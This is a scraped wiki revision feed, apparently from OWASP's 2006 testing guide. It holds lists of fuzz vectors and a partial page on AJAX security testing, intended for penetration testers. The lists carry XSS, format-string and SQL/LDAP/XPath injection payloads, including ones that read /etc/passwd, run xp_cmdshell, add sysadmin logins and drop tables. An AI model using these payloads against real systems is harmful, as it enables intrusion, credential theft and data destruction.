&lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13701 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-26T14:24:31Z <p>Wisec: /* Format String Errors (FSE) */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select <br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&diff=13700 Testing for AJAX Vulnerabilities (OWASP-AJ-001) 2006-11-26T14:13:19Z <p>Wisec: /* Attacks and Vulnerabilities */ fixed some typing error</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> <br /> == Introduction ==<br /> &lt;br&gt;<br /> '''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include&lt;br&gt;<br /> * Create a larger attack surface with many more inputs to secure&lt;br&gt;<br /> <br /> * Expose internal functions of the Web application server&lt;br&gt;<br /> <br /> * Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms&lt;br&gt;<br /> <br /> * Login Information and Intrusion Detection<br /> &lt;br&gt;<br /> <br /> == Attacks and Vulnerabilities == <br /> &lt;br&gt;<br /> '''XMLHttpRequest Vulnerabilities'''&lt;br&gt; AJAX uses XMLHttpRequest(XHR) object for all the back-end work. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.&lt;p&gt;<br /> <br /> Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.&lt;/p&gt;<br /> <br /> XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.<br /> <br /> &lt;p&gt;<br /> &lt;br&gt;<br /> <br /> '''Increased Attack Surface''' &lt;br&gt;<br /> Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content.&lt;br&gt;&lt;br&gt;<br /> <br /> '''SQL Injection'''&lt;br&gt;SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. &lt;br&gt; A typical SQL Injection attack could be as follows&lt;br&gt;<br /> <br /> *'''''Example 1'''''<br /> &lt;pre&gt;<br /> SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;<br /> &lt;/pre&gt;<br /> This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges.&lt;br&gt;<br /> <br /> *'''''Example 2'''''<br /> &lt;pre&gt;<br /> SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;<br /> &lt;/pre&gt;<br /> The above query helps in dropping all the tables and destructs the database.&lt;br&gt;<br /> <br /> More on SQL Injection can be found at 